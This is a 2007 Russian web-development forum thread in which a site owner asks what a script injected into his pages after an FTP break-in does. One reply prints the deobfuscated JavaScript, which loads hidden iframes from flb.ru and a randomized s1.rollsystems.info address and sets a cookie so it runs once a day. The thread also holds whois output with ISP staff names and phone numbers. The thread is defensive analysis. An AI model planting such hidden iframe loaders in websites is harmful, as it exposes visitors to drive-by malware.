Зловредный скрипт - ЧТО ОН МОГ ДЕЛАТЬ? / HTML, JavaScript, VBScript, CSS

ReSQL.ru

2.0.59

Полная версия Контакт Правила FAQ Помощь

Гость

Войти | Профиль | Очистить

Нов. | Гор. | Избр.

Написать

Автор*:

Ввести пароль для входа

Тема*:

Сообщение

Данное сообщение тематическое

Сообщение содержит картинки или видео 18+

Автор:

ВНИМАНИЕ! На данном подфоруме действуют строгие правила. Удостоверьтесь, что ваше сообщение соответствует им!

Форум или тема закрыты для гостей. Необходима авторизация!

Загрузить последнюю сохраненную версию

Вставить как галерею

Максимальный размер вложений: 4,0 МБ, аудио/видео: 8,0 МБ. Картинки большего размера ужимаются, если возможно.

Введите код, изображенный на картинке. Если код нечитаемый, кликните картинку, чтобы загрузить другой вариант.

Отправляя сообщение, я выражаю свое согласие с правилами форума и принимаю пользовательское соглашение.

Действия ...

Доб. в избранное
Игнор. тему
Прикреп. тему
Пометить прочит. / непрочит.
Фильтр:
Сообщения автора темы
Сообщение содержит вложения
Сообщение содержит картинки
Сообщение содержит видеоклипы
Сообщение содержит аудиоклипы
Сообщение содержит картинки или видео 18+

Форумы / HTML, JavaScript, VBScript, CSS [игнор отключен] [закрыт для гостей] / Зловредный скрипт - ЧТО ОН МОГ ДЕЛАТЬ? / 12 сообщений из 12, страница 1 из 1

17.04.2007, 11:17

#34465685

SQLWalker

Гость

Зловредный скрипт - ЧТО ОН МОГ ДЕЛАТЬ?

Пару дней назад некий хакер пока неизвестным мне способом получил пароль на мой
ftp и к тексту некоторых страниц добавил некий скрипт. При открытии страницы у меня выскакивала ошибка "Приложение C:\Windows\oft.exe не является Win32 приложением".
В каталоге C:\Windows я обнаруживал пустой файл со случайным именем и расширением exe.
Кроме этого скрипт что-то отсылал например на узел flb.ru

Кто может по этому скрипту сказать о его действиях?

...

Рейтинг:

0 / 0

| Ответить | Цитировать | Написать

17.04.2007, 11:19

#34465700

SQLWalker

Гость

Зловредный скрипт - ЧТО ОН МОГ ДЕЛАТЬ?

Я скрипт прикрепил, а его нет. Пробую еще раз

...

Рейтинг:

0 / 0

| Ответить | Цитировать | Написать

17.04.2007, 11:54

#34465880

Antonariy

Участник

Откуда: ☭
Сообщения: 80 221
Рейтинг: 0 / 0

Зловредный скрипт - ЧТО ОН МОГ ДЕЛАТЬ?

Если снять обфускацию, то брюки превращаются...
<script language="javascript">
setTimeout(wfsw, 100);
setTimeout(wfsw, 1000);
setTimeout(wfsw, 2000);
setTimeout(wfsw, 3000);
setTimeout(wfsw, 4000);
setTimeout(wfsw, 5000);
setTimeout(function(){wfsw(true);}, 300);
setTimeout(function(){wfsw(true);}, 1200);
setTimeout(function(){wfsw(true);}, 2400);
setTimeout(function(){wfsw(true);}, 3600);
setTimeout(function(){wfsw(true);}, 4600);
setTimeout(function(){wfsw(true);}, 6000);
function wfsw(w){
var url,o;
url="http://" + (w ? "www." : "") + "flb.ru/info/"+Math.ceil(20000+Math.random()*22000)+".html";
o = document.createElement("iframe");
try { o.src=url;}
catch(e){o.setAttribute("src",url);}
o.style.display = "none";
o.style.width = "1px";
o.style.height = "1px";
o.frameBorder=0;
try { document.body.appendChild(o); }
catch(e){}
}

var cn = "sr0lfc";
var cv = "1";
var se = "s1.rollsystems.info";
var p = "/html/";

if(document.cookie.indexOf(cn+"="+cv) == -1){
var url = "http://" + (document.location.host != "" ? "" : rsys_rs()) + document.location.host.replace(/[^a-z0-9.-]/, ".").replace(/\.+/, ".") + "." + rsys_rs() + "." + se + p;
var o = document.createElement("iframe");
o.setAttribute("src", url);
o.frameBorder=1;
o.width=1;
o.height=1;
o.style.display="none";
try { document.body.appendChild(o); rsys_sc(cn,cv);}
catch(e){}
}
function rsys_rs(){
var l=48, c="01234567890abcdef", o="";
for(i=0; i < l; i++) o += c.substr(Math.floor(Math.random()*c.length),1,1);
return o;
}

function rsys_sc(cn,cv){
var t= new Date();
var e= new Date();
e.setTime(t.getTime()+3600000*24);
document.cookie = cn+"="+escape(cv)+";
expires="+e.toGMTString();
}
</script>Дальше думать лень...

...

Рейтинг:

0 / 0

| Ответить | Цитировать | Написать

17.04.2007, 12:05

#34465925

Antonariy

Участник

Откуда: ☭
Сообщения: 80 221
Рейтинг: 0 / 0

Зловредный скрипт - ЧТО ОН МОГ ДЕЛАТЬ?

По-моему это банальная раскрутка сайта флб.ру

...

Рейтинг:

0 / 0

| Ответить | Цитировать | Написать

17.04.2007, 12:12

#34465966

Antonariy

Участник

Откуда: ☭
Сообщения: 80 221
Рейтинг: 0 / 0

Зловредный скрипт - ЧТО ОН МОГ ДЕЛАТЬ?

Советую обратить внимание на сайт s1.rollsystems.info - яндекс первой же ссылкой выдал вот это .

ip этого сайта - 83.136.26.157, whois выдал такую инфу:

Код: plaintext

1.
2.
3.
4.
5.
6.
7.
8.
9.
10.
11.
12.
13.
14.
15.
16.
17.
18.
19.
20.
21.
22.
23.
24.
25.
26.
27.
28.
29.
30.
31.
32.
33.
34.
35.
36.
37.
38.
39.
40.
41.
42.

inetnum:   83.136.26.0 - 83.136.26.255 
netname:   MTU-INFORM-NETWORK 
descr:    MTU-Inform company 
country:   RU 
admin-c:   MIKE7-RIPE 
admin-c:   DIMA1-RIPE 
tech-c:    MIKE7-RIPE 
tech-c:    DIMA1-RIPE 
status:    ASSIGNED PA 
mnt-by:    MTU-INFORM-MNT 
mnt-lower:  MTU-INFORM-MNT 
mnt-routes:  MTU-INFORM-MNT 
source:    RIPE # Filtered 

person:     Mikhail K Grachikov 
address:    MTU-Inform 
address:    Smolenskaya-Sennaya Sq., 27, bld. 2 
address:    119121, Moscow, 
remarks:    phone:    +7 095 2587886 
phone:     +7 495 2587886 
remarks:    ------------------------------------------------ 
remarks:    Please send abuse reports to  
remarks:    ------------------------------------------------ 
e-mail:      
nic-hdl:    MIKE7-RIPE 
mnt-by:     MTU-INFORM-MNT 
source:     RIPE # Filtered 
remarks:    modified for Russian phone area changes 

person:     Dmitri A Kravtsov 
address:    MTU-Inform 
address:    Smolenskaya-Sennaya Sq., 27, bld. 2 
address:    119121, Moscow, 
remarks:    phone:    +7 095 7213475 
phone:     +7 495 7213475 
e-mail:      
remarks:    ------------------------------------------------ 
remarks:    Please send abuse reports to  
remarks:    ------------------------------------------------ 
nic-hdl:    DIMA1-RIPE 
mnt-by:     MTU-INFORM-MNT 
source:     RIPE # Filtered 
remarks:    modified for Russian phone area changes

Можно обратиться к указанным товарищам...

...

Рейтинг:

0 / 0

| Ответить | Цитировать | Написать

17.04.2007, 12:15

#34465983

SQLWalker

Гость

Зловредный скрипт - ЧТО ОН МОГ ДЕЛАТЬ?

AntonariyЕсли снять обфускацию...

Это уже кое-что. Спасибо. А как Вы сняли обфускацию ?

...

Рейтинг:

0 / 0

| Ответить | Цитировать | Написать

17.04.2007, 12:18

#34465997

Antonariy

Участник

Откуда: ☭
Сообщения: 80 221
Рейтинг: 0 / 0

Зловредный скрипт - ЧТО ОН МОГ ДЕЛАТЬ?

Вместо document.write(FZ); написал

Код: plaintext

1.
2.
3.

	var fso=new ActiveXObject("Scripting.FilesystemObject");
	var ts = fso.OpenTextFile("out.txt", 2 ,true);
	ts.write(FZ);
	ts.close();

и выполнил скрипт. Он содержит функцию расшифровки массива.

...

Рейтинг:

0 / 0

| Ответить | Цитировать | Написать

17.04.2007, 12:21

#34466015

SQLWalker

Гость

Зловредный скрипт - ЧТО ОН МОГ ДЕЛАТЬ?

AntonariyСоветую обратить внимание на сайт s1.rollsystems.info - яндекс первой же ссылкой выдал вот это .

ip этого сайта - 83.136.26.157, whois выдал такую инфу:
Можно обратиться к указанным товарищам...

Про ip адрес мне еще вчера сказал хостинг-провайдер - именно с этого адреса зашли по ftp и добавили скрипт. Но как они слили мои ftp пароли, пока не могу понять. Установлены и постоянно апдейтятся Outpost & NOD32.

Спасибо за инфу по rollsystems.info/html. Вот гады.

...

Рейтинг:

0 / 0

| Ответить | Цитировать | Написать

21.04.2007, 18:45

#34478159

Ferrari8246

Участник

Сообщения: 404
Рейтинг: 0 / 0

Зловредный скрипт - ЧТО ОН МОГ ДЕЛАТЬ?

пароли елементарно.
програмамми или шпионами.
чем угодно и как угодно.

...

Рейтинг:

0 / 0

| Ответить | Цитировать | Написать

21.04.2007, 21:06

#34478266

WEB_bobby

Участник

Сообщения: 393
Рейтинг: 0 / 0

Зловредный скрипт - ЧТО ОН МОГ ДЕЛАТЬ?

Зы так а вы не в курсе? В сети новый вирь!
Просвещаемся: >>>>

...

Рейтинг:

0 / 0

| Ответить | Цитировать | Написать

24.04.2007, 16:53

#34484172

John12

Гость

Зловредный скрипт - ЧТО ОН МОГ ДЕЛАТЬ?

Антивирус касперского его дерет, просто установи себе на комп с базами апдейта на 19 апреля 07
и версия AVP 4,5 =)
Удачи

...

Рейтинг:

0 / 0

| Ответить | Цитировать | Написать

24.04.2007, 16:58

#34484195

John12

Гость

Зловредный скрипт - ЧТО ОН МОГ ДЕЛАТЬ?

Привет ребят!!!
Ребята мне надо скрипт (VBS) или JS.
Надо чтобы с фтп мона было закачивать с UpLoadom списки файлов и проверять
дату их изменения, но причем чтобы скрипт не пользовался файлом ftp.exe а под виндой XP выполнял стандартные комнды скриптов.
Если это мона сделать через библиотеку (WinInet) то напишите пример как ато чет у меня
не получается ее подключить +)
Пожалуйсто хелпните меня =)
Репка вам++

...

Рейтинг:

0 / 0

| Ответить | Цитировать | Написать

Читали тему (0):

Читали форум (0):

Пользователи онлайн (0):

start [/forum/topic.php?fid=22&tablet=1&tid=1458408]:	0ms
get settings:	10ms
get forum list:	12ms
check forum access:	4ms
check topic access:	4ms
track hit:	61ms
get topic data:	11ms
get forum data:	2ms
get page messages:	44ms
get tp. blocked users:	2ms
others:	11ms

total:	161ms